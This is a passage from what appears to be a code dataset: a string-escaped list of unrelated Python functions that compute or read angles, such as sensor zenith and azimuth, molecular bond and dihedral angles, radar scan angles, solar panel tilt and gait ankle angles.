self.meta[\"FLYINGDIRECTION\"] == \"AE\":\n field = self.read_digitalnumbers(channel)[:400]\n\n # design n field\n sidx = np.arange(np.shape(field)[1])\n\n mid0 = sidx[np.isfinite(field[5, :])][[0, -1]].mean()\n mid1 = sidx[np.isfinite(field[-5, :])][[0, -1]].mean()\n\n f = interpolate.interp1d(\n np.array([5, np.shape(field)[0] - 5]),\n np.array([mid0, mid1]),\n kind=\"linear\",\n fill_value=\"extrapolate\",\n )\n\n mids = f(np.arange(np.shape(field)[0]))\n # costructing an n-array indexing the pixels symmetric to the center of the\n # swath. If pointing angle is zero, the sensor zenith angle is zero in the\n # swath center.\n n = sidx - mids[:, np.newaxis]\n\n # left and right side of nadir are defined such that the sign follows the\n # roll angle sign, which is negative on the right and positive on the left\n # side of the sensor in flying direction (!), NOT in projected image. 
The\n # sides therefore depend on the ascending / decending mode defined in the\n # meta data.\n flyingdir = self.meta[\"FLYINGDIRECTION\"]\n if flyingdir is \"DE\":\n n *= -1\n\n swath_widths = np.sum(np.isfinite(field), axis=1)\n # average swath width, but exluding possible NaN-scanlines at beginning and\n # end of the image.\n swath_width = np.mean(swath_widths[swath_widths > 4200])\n\n n_angles = n * FOV[sensor] / swath_width + P[sensor]\n azimuth = np.full_like(field, np.nan)\n\n if channel != \"3B\":\n zenith = abs(n_angles)\n\n if flyingdir is \"DE\":\n azimuth[n_angles > 0] = 90 + S\n azimuth[n_angles <= 0] = 270 + S\n else:\n azimuth[n_angles < 0] = 90 + S\n azimuth[n_angles >= 0] = 270 + S\n else:\n h = 705000 # in km above the equator\n zenith = np.rad2deg(\n np.arctan(\n np.sqrt(\n (h * np.tan(np.deg2rad(P[sensor])) + 15 * n) ** 2\n + (h * np.tan(np.deg2rad(27.6)) / np.cos(np.deg2rad(P[sensor])))\n ** 2\n )\n / h\n )\n )\n\n x = np.rad2deg(np.arctan(0.6 / np.tan(np.deg2rad(n_angles))))\n if flyingdir is \"DE\":\n azimuth[n_angles > 0] = np.array(90 - x + S)[n_angles > 0]\n azimuth[n_angles <= 0] = np.array(270 - x + S)[n_angles <= 0]\n else:\n azimuth[n_angles < 0] = np.array(90 - x + S)[n_angles < 0]\n azimuth[n_angles >= 0] = np.array(270 - x + S)[n_angles >= 0]\n\n zenith[np.isnan(field)] = np.nan\n azimuth[np.isnan(field)] = np.nan\n\n return zenith, azimuth", "def sector_angles(self) -> np.ndarray:\n return self._sector_angles", "def check_angle_of_arcs(self):\n\n if self.thin_arc_start_angle >= 3600:\n self.thin_arc_start_angle %= 360\n self.thin_arc_start_angle += 360\n\n elif self.thin_arc_start_angle <= -3600:\n self.thin_arc_start_angle %= 360\n self.thin_arc_start_angle -= 360\n\n if self.thin_arc_end_angle >= 3600:\n self.thin_arc_end_angle %= 360\n self.thin_arc_end_angle += 360\n\n elif self.thin_arc_end_angle <= -3600:\n self.thin_arc_end_angle %= 360\n self.thin_arc_end_angle -= 360\n\n if self.thick_arc_start_angle >= 3600:\n self.thick_arc_start_angle %= 360\n self.thick_arc_start_angle += 360\n\n elif self.thick_arc_start_angle <= -3600:\n self.thick_arc_start_angle %= 360\n self.thick_arc_start_angle -= 360\n\n if self.thick_arc_end_angle >= 3600:\n self.thick_arc_end_angle %= 360\n self.thick_arc_end_angle += 360\n\n elif self.thick_arc_end_angle <= -3600:\n self.thick_arc_end_angle %= 360\n self.thick_arc_end_angle -= 360", "def get_node_angles(self, node_name, frame):\n channels = self.node_names[node_name][\"channels\"]\n euler_angles = []\n rotation_order = []\n for ch in channels:\n if ch.lower().endswith(\"rotation\"):\n idx = self.node_channels.index((node_name, ch))\n rotation_order.append(ch)\n euler_angles.append(frame[idx])\n return euler_angles, rotation_order", "def get_internal_angles(self):\n\n angles = []\n\n for elx, elz in zip(self.grid['x'], self.grid['z']):\n el_angles = []\n xy = np.vstack((elx, elz))\n for i in range(0, elx.size):\n i1 = (i - 1) % elx.size\n i2 = (i + 1) % elx.size\n\n a = (xy[:, i] - xy[:, i1])\n b = (xy[:, i2] - xy[:, i])\n # note that nodes are ordered counter-clockwise!\n angle = np.pi - np.arctan2(\n a[0] * b[1] - a[1] * b[0],\n a[0] * b[0] + a[1] * b[1]\n )\n el_angles.append(angle * 180 / np.pi)\n angles.append(el_angles)\n return np.array(angles)", "def calc_angles_struct(structure):\n if isinstance(structure,list):\n lig_angles = np.array(structure)[np.argsort(angs)[::-1]]\n else:\n mol = io_molecule.convert_io_molecule(structure)\n if len(mol.graph) == 0:\n print('Creating imputed molecular graph! 
May be untrustworthy.')\n mol.create_BO_dict()\n mets = mol.find_metals()\n lig_angles = []\n if len(mets) == 1:\n coordats = np.nonzero(mol.graph[mets[0]])[0]\n if len(coordats) == 1:\n lig_angles = []\n else:\n coords = mol.ase_atoms.get_positions()\n angs = [\n get_angle(coords[x[0]],coords[mets[0]],coords[x[1]]) for x in itertools.combinations(coordats,2)\n ]\n angs = np.array(angs)[np.argsort(angs)[::-1]] # Add angles\n lig_angles += angs.tolist() # Add sorted angles as features\n else:\n print('Warning: User ligand input without metal for refernce on interatomic angles. \\\n Please pass a structure with a metal for user ligand generation.')\n lig_angles += [0.0] * (36-len(lig_angles)) # Pad with zeros\n n_ca_m_ca_angles = len(np.nonzero(lig_angles)[0])\n denticity = denticity_combinations_dict[n_ca_m_ca_angles]\n return {'user_lig':np.array(lig_angles)}, denticity", "def rotationDetermination(self):\n \n for index, row in enumerate(self.magdata):\n if index > 11 and index < (len(self.magdata) - 12):\n br1 = [row[0] for row in self.magdata[(index-12):(index-2)]]\n bt1 = [row[1] for row in self.magdata[(index-12):(index-2)]]\n bn1 = [row[2] for row in self.magdata[(index-12):(index-2)]]\n b1 = np.matrix((np.mean(br1), np.mean(bt1), np.mean(bn1)))\n\n br2 = [row[0] for row in self.magdata[(index+2):(index+12)]]\n bt2 = [row[1] for row in self.magdata[(index+2):(index+12)]]\n bn2 = [row[2] for row in self.magdata[(index+2):(index+12)]]\n b2 = np.matrix((np.mean(br2), np.mean(bt2), np.mean(bn2)))\n\n theta = np.arccos(np.dot(b1,b2.T)/(np.linalg.norm(b1)*np.linalg.norm(b2)))*180/np.pi\n\n self.detections.rotations.append(theta[0,0])\n self.detections.rotationTimeTags.append(self.timestamps[index])\n \n\n## self.b1 = b1\n## self.b2 = b2\n self.detections.rotationBoundary=[]\n if len(self.detections.rotations) != 0:\n \n for index, theta in enumerate(self.detections.rotations):\n if index > 0:\n if theta > 30 and self.detections.rotations[index-1] < 30:\n self.detections.rotationBoundary.append(self.detections.rotationTimeTags[index])\n if index < len(self.detections.rotations)-1:\n if theta > 30 and self.detections.rotations[index+1] < 30:\n self.detections.rotationBoundary.append(self.detections.rotationTimeTags[index])", "def to_angles(self) -> np.ndarray:\n phi = np.arctan2(self.A[1, 2], self.A[2, 2]) # Roll Angle\n theta = -np.sin(self.A[0, 2]) # Pitch Angle\n psi = np.arctan2(self.A[0, 1], self.A[0, 0]) # Yaw Angle\n return np.array([phi, theta, psi])", "def read_area_shapes(path_ew, path_s):\n output = []\n\n with fiona.open(path_ew, 'r') as reader:\n for lsoa in reader:\n output.append({\n 'type': lsoa['type'],\n 'geometry': lsoa['geometry'],\n 'properties': {\n 'code': lsoa['properties']['LSOA11CD'],\n # 'LSOA11NM': lsoa['properties']['LSOA11NM'],\n }\n })\n\n with fiona.open(path_s, 'r') as reader:\n for datazone in reader:\n output.append({\n 'type': datazone['type'],\n 'geometry': datazone['geometry'],\n 'properties': {\n 'code': datazone['properties']['DataZone'],\n # 'LSOA11NM': lsoa['properties']['LSOA11NM'],\n }\n })\n\n return output", "def average_angle_for_box(n_detectors, n_detectors_middle, n_detectors_upper_lower):\n\n angles_for_middle_box = n_detectors[0:n_detectors_middle]\n middle_angle = sum(angles_for_middle_box) / len(angles_for_middle_box)\n\n angles_for_upper_lower_box = n_detectors[0:n_detectors_upper_lower]\n if len(angles_for_upper_lower_box) > 0:\n upper_lower_angle = sum(angles_for_upper_lower_box) / len(angles_for_upper_lower_box)\n else:\n 
upper_lower_angle = 0\n\n n_detectors = n_detectors[max(n_detectors_middle, n_detectors_upper_lower):]\n return middle_angle, upper_lower_angle, n_detectors", "def getAngles(self):\n try:\n return self._angleList\n except AttributeError:\n pass\n forceConstant=self._raw_data[\"ANGLE_FORCE_CONSTANT\"]\n angleEquil=self._raw_data[\"ANGLE_EQUIL_VALUE\"]\n anglePointers = self._raw_data[\"ANGLES_INC_HYDROGEN\"] \\\n +self._raw_data[\"ANGLES_WITHOUT_HYDROGEN\"]\n self._angleList=[]\n forceConstConversionFactor = (units.kilocalorie_per_mole/(units.radian*units.radian)).conversion_factor_to(units.kilojoule_per_mole/(units.radian*units.radian))\n for ii in range(0,len(anglePointers),4):\n if int(anglePointers[ii])<0 or \\\n int(anglePointers[ii+1])<0 or \\\n int(anglePointers[ii+2])<0:\n raise Exception(\"Found negative angle atom pointers %s\"\n % ((anglePointers[ii],\n anglePointers[ii+1],\n anglePointers[ii+2]),))\n iType=int(anglePointers[ii+3])-1\n self._angleList.append((int(anglePointers[ii])//3,\n int(anglePointers[ii+1])//3,\n int(anglePointers[ii+2])//3,\n float(forceConstant[iType])*forceConstConversionFactor,\n float(angleEquil[iType])))\n return self._angleList", "def get_angles(sides):\n return [get_angle(sides[1], sides[2], sides[0]),\n get_angle(sides[2], sides[0], sides[1]),\n get_angle(sides[0], sides[1], sides[2])]", "def _get_angle(ray_info, angle_step=None, scan_type=\"ppi\"):\n bin_to_deg = 360.0 / 65536.0\n\n def _extract_angles(data):\n angle = np.array(data * bin_to_deg, dtype=\"float64\")\n if scan_type == \"rhi\":\n ind = (angle > 225.0).nonzero()\n angle[ind] -= 360.0\n return angle\n\n try:\n angle_start = _extract_angles(ray_info[\"data\"])\n if angle_step is None:\n raise ValueError(\"Unknown angle step\")\n angle_stop = angle_start + angle_step\n except TypeError:\n angle_start = _extract_angles(ray_info[0][\"data\"])\n angle_stop = _extract_angles(ray_info[1][\"data\"])\n\n moving_angle = np.angle(\n (np.exp(1.0j * np.deg2rad(angle_start)) + np.exp(1.0j * np.deg2rad(angle_stop)))\n / 2.0,\n deg=True,\n )\n moving_angle[moving_angle < 0.0] += 360.0 # [0, 360]\n\n return moving_angle, angle_start, angle_stop", "def output_angles(frame, analysis_dict, reference):\n y_pos = 20\n for key, value in analysis_dict.items():\n if key in reference.keys():\n text = \"{}: Angle = {:.2f}, Diff = {:.2f}\".format(key, value, value - reference[key])\n cv2.putText(frame, text, (0, y_pos), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 0), 2,\n cv2.LINE_AA)\n cv2.putText(frame, text, (0, y_pos), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 255, 255), 1,\n cv2.LINE_AA)\n y_pos += 20\n return frame", "def parse_azimuth_elevation(filename):\n match = REGEX.match(filename)\n return int(match.group(1)), int(match.group(2))", "def test_calculate_angle():\n r1 = np.array([0, 0, -1])\n r2 = np.array([0, 0, 0])\n r3 = np.array([1, 0, 0])\n\n expected_angle = 90\n calculated_angle = molecool.calculate_angle(r1, r2, r3, degrees = True)\n\n assert expected_angle == calculated_angle", "def get_angles(self):\n if self.wavelength_control:\n return self.gonio_angles + self.wl_angles\n else:\n return self.gonio_angles", "def estimate_rotation(bounding_box):\n # x,y coord of topleft corner\n x,y,w,h = bounding_box\n rotation_arg = np.abs(1 - (h/float(w)))*2\n return rad_to_deg( np.arctan(rotation_arg) )", "def get_eangles(self):\n return self.eangles", "def leaf_azimuth(size=1, phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False):\n if size == 1:\n return plant_orientation\n if 
spiral:\n main = numpy.arange(0, size) * phyllotactic_angle\n else:\n it = cycle((0, phyllotactic_angle))\n main = numpy.array([it.next() for i in xrange(size)])\n azim = plant_orientation + main + (numpy.random.random(size) - 0.5) * 2 * phyllotactic_deviation\n azim = azim % 360\n return numpy.where(azim <= 180, azim, azim - 360)", "def calc_all_coord_atom_angles(core_geo):\n origin = np.array((0,0,0))\n angles = []\n for a,b in itertools.combinations(core_geo,2):\n angles.append(get_angle(a,origin,b))\n return np.array(sorted(angles))", "def readangles(filelist):\r\n filelen = len(filelist) - 2\r\n output = {'RightAnkleAngle': [], 'LeftAnkleAngle': [], 'Frames': {}}\r\n anglestart = filelen\r\n LeftStrike = []\r\n RightStrike = []\r\n events = 0\r\n for n in range(filelen):\r\n try:\r\n if filelist[n][0] == 'Model Outputs':\r\n anglestart = n + 5\r\n elif filelist[n][0] == 'Events':\r\n events = 1\r\n elif filelist[n][2] == 'Walking Speed':\r\n output[filelist[n][1]+'Speed'] = float(filelist[n][3])\r\n elif filelist[n][2] == 'Foot Off' and events == 1:\r\n # Footoff frame in events\r\n output['Frames'].update({filelist[n][1]+'Foff' : int(float(filelist[n][3]) * 100)})\r\n elif filelist[n][2] == 'Stride Length':\r\n output[filelist[n][1]+'StrideLen'] = float(filelist[n][3])\r\n elif filelist[n][2] == 'Foot Strike': \r\n # Convert seconds to frames at 100Hz.\r\n if filelist[n][1] == 'Left':\r\n LeftStrike.append(int(float(filelist[n][3]) * 100))\r\n elif filelist[n][1] == 'Right':\r\n RightStrike.append(int(float(filelist[n][3]) * 100)) \r\n elif n >= anglestart:\r\n # List ankle abs angles, convert to float if possible\r\n try:\r\n output['LeftAnkleAngle'].append(float(filelist[n][2]))\r\n except ValueError:\r\n output['LeftAnkleAngle'].append(filelist[n][2])\r\n try:\r\n output['RightAnkleAngle'].append(float(filelist[n][101]))\r\n except ValueError:\r\n output['RightAnkleAngle'].append(filelist[n][101])\r\n except IndexError:\r\n continue\r\n sides = ['Left', 'Right']\r\n for side in sides:\r\n output['Frames'].update({side+'Start' : min(locals()[side+'Strike'])})\r\n output['Frames'].update({side+'End' : max(locals()[side+'Strike'])})\r\n output.update(tableread(filelist,anglestart,output['Frames'],'Angle'))\r\n if anglestart == filelen:\r\n raise NameError('No angles in angle file!')\r\n for side in sides:\r\n mintoe = min(output[side[0]+'AnkleAnglesX'])\r\n midswingframe = int(output['Frames'][side+'Foff']/2 + output['Frames'][side+'End']/2 - output['Frames'][side+'Start'])\r\n output[side+'Clearance'] = output[side[0]+'AnkleAnglesX'][midswingframe] - mintoe\r\n #import pdb; pdb.set_trace()\r\n return output", "def angles(self):\n return self._angles", "def get_dihedral_angles(self):\n mol = self.m\n c1 = mol.GetConformer(-1)\n torsma = '[!$(*#*)&!D1]~[!$(*#*)&!D1]'\n q = Chem.MolFromSmarts(torsma)\n matches = mol.GetSubstructMatches(q)\n nmat = len(matches)\n dic = {}\n for match in matches:\n j = match[0]\n k = match[1]\n bond = mol.GetBondBetweenAtoms(j, k)\n aj = mol.GetAtomWithIdx(j)\n ak = mol.GetAtomWithIdx(k)\n hj, hk = [ _hyb[_a.GetHybridization()] for _a in [aj,ak] ]\n iok1 = ( hj not in [2,3] )\n iok2 = ( hk not in [2,3] )\n if iok1 or iok2: continue\n for b1 in aj.GetBonds():\n if (b1.GetIdx() == bond.GetIdx()):\n continue\n i = b1.GetOtherAtomIdx(j)\n for b2 in ak.GetBonds():\n if (b2.GetIdx() == bond.GetIdx()) or (b2.GetIdx() == b1.GetIdx()):\n continue\n l = b2.GetOtherAtomIdx(k)\n # skip 3-membered rings\n if (l == i):\n continue\n _dang = 
rdMolTransforms.GetDihedralDeg(c1, i,j,k,l)\n dang = abs(_dang)\n assert dang <= 180.0\n ias4 = (i,j,k,l)\n if not self.wH:\n if np.any([ self.zs[iaa]==1 for iaa in ias4 ]):\n continue\n if self.key in ['z']:\n #print('atsi=',ias4, 'zsi=', [_zs[iaa] for iaa in ias4])\n zi,zj,zk,zl = [ self.zs[iaa] for iaa in ias4 ]\n if (zj==zk and zi>zl) or (zj>zk):\n ias4 = (l,k,j,i)\n #torsions.append(ias4)\n #_zi,_zj,_zk,_zl = [ zs[_] for _ in ias4 ]\n #typez = '%d-%d-%d-%d'%(_zi,_zj,_zk,_zl)\n type4 = tuple([self.zs[iaa] for iaa in ias4])\n if type4 in list(dic.keys()):\n dic[type4] += [dang]\n else:\n dic[type4] = [dang]\n elif self.key in ['ia','i']:\n type4 = ias4\n dic[type4] = dang\n else:\n raise Exception('#unknown key')\n return dic", "def get_oas(user_settings, area_code):\r\n queryText2 = user_settings['url'] + \"/data/boundaries/oas_in_lad?lad_codes=\" + area_code\r\n\r\n response = requests.get(queryText2, auth=(user_settings['user'], user_settings['password']))\r\n\r\n i = 0\r\n # OAPolys = {}\r\n OA_Attributes = {}\r\n OANeigh_Dict = {}\r\n\r\n # 200 = successful\r\n if response.status_code == 200:\r\n\r\n jsonText = json.loads(response.text)\r\n\r\n for textLine in jsonText:\r\n i += 1\r\n poly = shapely.wkt.loads(textLine['geom'])\r\n\r\n OA_code = str(textLine['oa_code'])\r\n # OAPolys[OA_code] = poly\r\n OA_Attributes[OA_code] = textLine\r\n OANeigh_Dict[OA_code] = textLine['oa_neighbours']\r\n\r\n print(i, \" OAs loaded successfully\")\r\n return OA_Attributes, OANeigh_Dict, i\r\n\r\n else:\r\n logging.error(\"Error loading OAs from API. OA query response code is: \", response.status_code)\r\n print(\"Error loading OAs from API. OA query response code is: \", response.status_code)\r\n return \"Error loading OAs from API. OA query response code is: %s\" % response.status_code", "def search_base_angles(self, motor_positions):\n\n # Errore nelle soluzioni\n err = [0, 0, 0]\n\n # Angolo di inizio ricerca\n # Se gia' eseguita una conversione suo i valori precedenti\n if self.isLastAnglesValid:\n self.alpha_start = list(self.alpha)\n else:\n # Angolo minimo di partenza ( -alpha_limit )\n # TO_CHECK: perche' parto da una configurazione sicuramente errata? -10?\n self.alpha_start = [self.alpha_limit_r, self.alpha_limit_r, self.alpha_limit_r]\n\n # Angoli presunti\n # self.temp = list(self.alpha_start)\n alpha = list(self.alpha_start)\n\n # Altezze reali degli attuatori\n height = [self.real_height + motor_positions[0],\n self.real_height + motor_positions[1],\n self.real_height + motor_positions[2]]\n\n # Trovo il mediano tra 0-1-2\n '''\n if any([all([motor_positions[0] > motor_positions[1], motor_positions[0] < motor_positions[2]]),\n all([motor_positions[0] < motor_positions[1], motor_positions[0] > motor_positions[2]])]):\n is_0_median = True\n is_1_median = False\n is_2_median = False\n else:\n is_0_median = False\n if any([all([motor_positions[1] > motor_positions[2], motor_positions[1] < motor_positions[0]]),\n all([motor_positions[1] < motor_positions[2], motor_positions[1] > motor_positions[0]])]):\n is_0_median = False\n is_1_median = True\n is_2_median = False\n else:\n is_1_median = False\n if any([all([motor_positions[2] > motor_positions[1], motor_positions[2] < motor_positions[0]]),\n all([motor_positions[2] < motor_positions[1], motor_positions[2] > motor_positions[0]])]):\n is_0_median = False\n is_1_median = False\n is_2_median = True\n else:\n is_2_median = False\n '''\n\n # Incrementi degli angoli\n # TO_CHECK: perche' quattro? 
L'ultimo e' di backup?\n step_alpha_base = 0.1 * Kinematic.M_TO_RAD\n step_alpha = [step_alpha_base, step_alpha_base, step_alpha_base]\n\n # Numero di cicli eseguiti\n self.cycles = 0\n\n # Calcolo la condizione iniziale\n d1 = self.distance_12(alpha, height)\n err[0] = d1 - self.base_length\n step_alpha[1] = err[0] * self.ke * step_alpha_base\n\n d2 = self.distance_23(alpha, height)\n err[1] = d2 - self.base_length\n step_alpha[2] = err[1] * self.ke * step_alpha_base\n\n d3 = self.distance_13(alpha, height)\n err[2] = d3 - self.base_length\n step_alpha[0] = err[2] * self.ke * step_alpha_base\n\n i = 0\n while i < self.cycle_limit:\n\n i += 1\n\n # Incremento alfa1 ed azzero alfa2\n alpha[0] += step_alpha[0]\n alpha[1] = self.alpha_start[1]\n\n j = 0\n\n while j < self.cycle_limit:\n\n j += 1\n\n # self.next_iteration(alpha, step_alpha, i, j, n, err)\n self.cycles += 1\n\n if self.cycles > self.cycle_limit:\n logging.error(\"Maximum number of cycles executed, no solution found!\")\n return False\n\n # Incremento alfa1 ed azzero alfa2\n alpha[1] += step_alpha[1]\n\n # Se supero l'angolo limite\n # Partendo da -10 ( -0.17 ), non devo superare 10 ( 0.17 )\n if alpha[1] > -self.alpha_limit_r:\n\n # Angolo non trovato\n step_alpha[1] = step_alpha_base\n step_alpha[0] = err[0] * step_alpha_base * self.ke\n self.alpha_start[1] = -self.alpha_limit_r - 2 * step_alpha[1]\n break\n\n d1 = self.distance_12(alpha, height)\n err[0] = d1 - self.base_length\n step_alpha[1] = err[0] * self.ke * step_alpha_base\n\n if abs(err[0]) < self.err_limit:\n\n # Trovato il minimo\n self.alpha_start[1] = alpha[1]\n step_alpha[1] = step_alpha_base\n\n n = 0\n while n < self.cycle_limit:\n\n n += 1\n\n # self.next_iteration(alpha, step_alpha, i, j, n, err)\n self.cycles += 1\n\n if self.cycles > self.cycle_limit:\n logging.error(\"Maximum number of cycles executed, no solution found!\")\n return False\n\n alpha[2] += step_alpha[2]\n d2 = self.distance_23(alpha, height)\n err[1] = d2 - self.base_length\n step_alpha[2] = err[1] * self.ke * step_alpha_base\n\n if abs(err[1]) < self.err_limit:\n\n step_alpha[2] = step_alpha_base\n d3 = self.distance_13(alpha, height)\n err[2] = d3 - self.base_length\n step_alpha[0] = err[2] * self.ke * step_alpha_base\n\n if abs(err[2]) < self.err_limit:\n\n # Trovatas la soluzione\n self.alpha = list(alpha)\n return True\n\n # NEXT j!!!\n break\n\n # Next i!!!\n break", "def optimal_angle_and_tilt(sensors_metadata_clean, latitude, sun_properties, Max_Isol, panel_properties):\n # calculate panel tilt angle (B) for flat roofs (tilt < 5 degrees), slope roofs and walls.\n optimal_angle_flat = calc_optimal_angle(180, latitude, sun_properties.trr_mean) # assume surface azimuth = 180 (N,E), south facing\n sensors_metadata_clean['tilt']= np.vectorize(acos)(sensors_metadata_clean['Zdir']) #surface tilt angle in rad\n sensors_metadata_clean['tilt'] = np.vectorize(degrees)(sensors_metadata_clean['tilt']) #surface tilt angle in degrees\n sensors_metadata_clean['B'] = np.where(sensors_metadata_clean['tilt'] >= 5, sensors_metadata_clean['tilt'],\n degrees(optimal_angle_flat)) # panel tilt angle in degrees\n\n # calculate spacing and surface azimuth of the panels for flat roofs\n module_length = panel_properties['module_length']\n optimal_spacing_flat = calc_optimal_spacing(sun_properties, optimal_angle_flat, module_length)\n sensors_metadata_clean['array_s'] = np.where(sensors_metadata_clean['tilt'] >= 5, 0, optimal_spacing_flat)\n sensors_metadata_clean['surface_azimuth'] = 
np.vectorize(calc_surface_azimuth)(sensors_metadata_clean['Xdir'],\n sensors_metadata_clean['Ydir'],\n sensors_metadata_clean['B']) # degrees\n\n # calculate the surface area required to install one pv panel on flat roofs with defined tilt angle and array spacing\n if panel_properties['type'] == 'PV':\n module_width = module_length # for PV\n else:\n module_width = panel_properties['module_area']/module_length # for FP, ET\n module_flat_surface_area = module_width * (sensors_metadata_clean.array_s / 2 + module_length * cos(optimal_angle_flat))\n area_per_module = module_width * module_length\n\n # calculate the pv/solar collector module area within the area of each sensor point\n sensors_metadata_clean['area_installed_module'] = np.where(sensors_metadata_clean['tilt'] >= 5, sensors_metadata_clean.AREA_m2,\n area_per_module * (sensors_metadata_clean.AREA_m2 / module_flat_surface_area))\n\n # categorize the sensors by surface_azimuth, B, GB\n result = np.vectorize(calc_categoriesroof)(sensors_metadata_clean.surface_azimuth, sensors_metadata_clean.B,\n sensors_metadata_clean.total_rad_Whm2, Max_Isol)\n sensors_metadata_clean['CATteta_z'] = result[0]\n sensors_metadata_clean['CATB'] = result[1]\n sensors_metadata_clean['CATGB'] = result[2]\n return sensors_metadata_clean", "def calc_incidence_angle():\n \n Delta_r, lat_r, Omega_r, Zenith_r, Azimuth_r, Elev_angle = solar_model()\n \n # Beta is equal to angle of tilted surface to horizontal (in radians)\n roof_slopes_west = section_coordinates()\n Beta_r = np.arctan(roof_slopes_west) \n incidence_angles_west = np.zeros(101)\n \n \n for i in range(0,len(roof_slopes_west)):\n incidence_angles_west[i] = np.arccos(np.sin(Delta_r)* np.sin(lat_r) * np.cos(Beta_r[i]) - np.sin(Delta_r) * np.cos(lat_r) * np.sin(Beta_r[i]) * np.cos(Azimuth_r) + np.cos(Delta_r) * np.cos(lat_r) * np.cos(Beta_r[i]) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(lat_r) * np.sin(Beta_r[i]) * np.cos(Azimuth_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(Beta_r[i]) * np.sin(Azimuth_r) * np.sin(Omega_r))", "def angle_difference(self):\n inigen = IniGen()\n fields = algorithm_fields.algorithms['angle_difference']\n\n output_uuid_map = {}\n\n # set up global parameters\n algorithm_path = fields['path']\n enabled = \"True\"\n inigen.emit_global(algorithm_path, enabled)\n\n for label in self.uuid_map:\n if label == 'LSTATE' or 'MAG' in label:\n continue\n distillate_label = get_distillate_label([label])\n\n # header\n inigen.emit_run_header(label, CHUNKING, MINTIME, MAXTIME)\n\n # body\n dep_ref_label = \"{0} {1}\".format(label, self.ref_name)\n dep_ref_name = fields['deps'][0]\n dep_ref_uuid = self.reference_uuid_map[label]\n dep_label = \"{0} {1}\".format(label, self.name)\n dep_name = fields['deps'][1]\n dep_uuid = self.uuid_map[label]\n deps = [[dep_ref_label, dep_ref_name, dep_ref_uuid], [dep_label, dep_name, dep_uuid]]\n\n param_section_name = fields['params'][0]\n param_section_value = \"Production/{0}/{1}/{2}/{3}\".format(self.location, self.ref_name, self.name, distillate_label)\n param_name_name = fields['params'][1]\n param_name_value = \"ANGLE-DIFF\"\n params = [[param_section_name, param_section_value], [param_name_name, param_name_value]]\n\n outputs = fields['outputs']\n\n emitted = inigen.emit_run_body(deps, params, outputs)\n\n output_uuid_map[label] = emitted[-2][-36:]\n\n filename = \"{0}/ANG-DIFF_{1}.ini\".format(self.dirname, self.name)\n inigen.generate_file(filename)\n return output_uuid_map", "def read_image_and_angle(root_path, data, camera, index):\n 
image_path = os.path.join(root_path,\n data[cameras[camera]].values[index].strip())\n image = plt.image.imread(image_path)\n angle = data.steering.values[index] + cameras_correction[camera]\n\n return image, angle", "def parse_elevations_response(elevations_response):\n return [result[\"elevation\"] for result in elevations_response]", "def test_rotation_angle(self):\n\n self.test_shape.azimuth_placement_angle = [45, 135, 225, 315]\n test_volume = self.test_shape.volume()\n self.test_shape.rotation_angle = 180\n assert self.test_shape.volume() == pytest.approx(test_volume * 0.5)", "def align_z_along_fixed_ends(xyz_file_parts, fixed_beginning, fixed_end):\n\n\t\tmolecule_axis = [xyz_file_parts[-1][1,fixed_end],xyz_file_parts[-1][2,fixed_end],xyz_file_parts[-1][3,fixed_end]]\n\n\n\t\tangle = np.arccos(molecule_axis[2]/np.linalg.norm(molecule_axis))\n\t\ttheta = angle\n\n\t\tif(angle != 0):\n\t\t\t#calculate rotation axis\n\t\t\trotation_axis = np.cross(molecule_axis, [0.0,0.0,1.0])\n\t\t\trotation_axis = 1.0/np.linalg.norm(rotation_axis)*rotation_axis\n\t\t\tu = rotation_axis\n\n\t\t\t#calculate rotation_matrix\n\t\t\trotation_matrix = [[np.cos(theta) + u[0]**2 * (1-np.cos(theta)), u[0] * u[1] * (1-np.cos(theta)) - u[2] * np.sin(theta), u[0] * u[2] * (1 - np.cos(theta)) + u[1] * np.sin(theta)],\n\t [u[0] * u[1] * (1-np.cos(theta)) + u[2] * np.sin(theta), np.cos(theta) + u[1]**2 * (1-np.cos(theta)), u[1] * u[2] * (1 - np.cos(theta)) - u[0] * np.sin(theta)],\n\t [u[0] * u[2] * (1-np.cos(theta)) - u[1] * np.sin(theta), u[1] * u[2] * (1-np.cos(theta)) + u[0] * np.sin(theta), np.cos(theta) + u[2]**2 * (1-np.cos(theta))]]\n\n\t\t\tfor j in range(0, len(xyz_file_parts)):\n\t\t\t\tfor i in range(0, len(xyz_file_parts[j][1,:])):\n\t\t\t\t\t \n\t\t\t\t\tvector_to_rotate = [round(float(xyz_file_parts[j][1,i]),5),round(float(xyz_file_parts[j][2,i]),5),round(float(xyz_file_parts[j][3,i]),5)]\n\t\t\t\t\trotated_vector = np.asmatrix(rotation_matrix)*np.asmatrix(vector_to_rotate).T\n\t\t\t\t\txyz_file_parts[j][1,i] = round(rotated_vector[0,0],5)\n\t\t\t\t\txyz_file_parts[j][2,i] = round(rotated_vector[1,0],5)\n\t\t\t\t\txyz_file_parts[j][3,i] = round(rotated_vector[2,0],5)\n\t\t\treturn xyz_file_parts\n\t\telse:\n\t\t\treturn xyz_file_parts", "def test_calc_rotation(self):\n t = AioBaseTurtle()\n t.speed(speed=2)\n orient, steps, delta = t._calc_rotation(120)\n self.assertEqual(steps, 21)\n self.assertAlmostEqual(delta, 120.0 / 21.0)\n self.assertAlmostEqual(orient[0], math.cos(math.radians(120)))\n self.assertAlmostEqual(orient[1], math.sin(math.radians(120)))", "def load_hrpsys_log_astate(astate_path, angle_unit=\"deg\"):\n\n astate = np.loadtxt(astate_path, comments=\"%\")\n if astate.shape[1] != 176:\n sys.exit([astate_path, \" is not a valid \" \"*-astate.log\" \" file\"])\n\n m = astate.shape[0]\n dt = \"f4\"\n a = np.zeros(\n m,\n dtype=[\n (\"enc\", dt, 40),\n (\"torque\", dt, 40),\n (\"ss\", dt, 40),\n (\"forceRL\", dt, 6),\n (\"forceLL\", dt, 6),\n (\"forceRA\", dt, 6),\n (\"forceLA\", dt, 6),\n (\"acc\", dt, 6),\n (\"gyro\", dt, 3),\n (\"qrot\", dt, 9),\n (\"waist_p\", dt, 3),\n (\"waist_rot\", dt, 9),\n (\"time\", dt, 1),\n (\"controltimev2\", dt, 1),\n (\"type\", \"a6\"),\n (\"ang_type\", \"a3\"),\n ],\n )\n a[\"enc\"] = astate[:, 0:40]\n # JA0-JA39\n a[\"torque\"] = astate[:, 40:80]\n # TQ0-TQ39\n a[\"ss\"] = astate[:, 80:120]\n # SS0-SS39\n 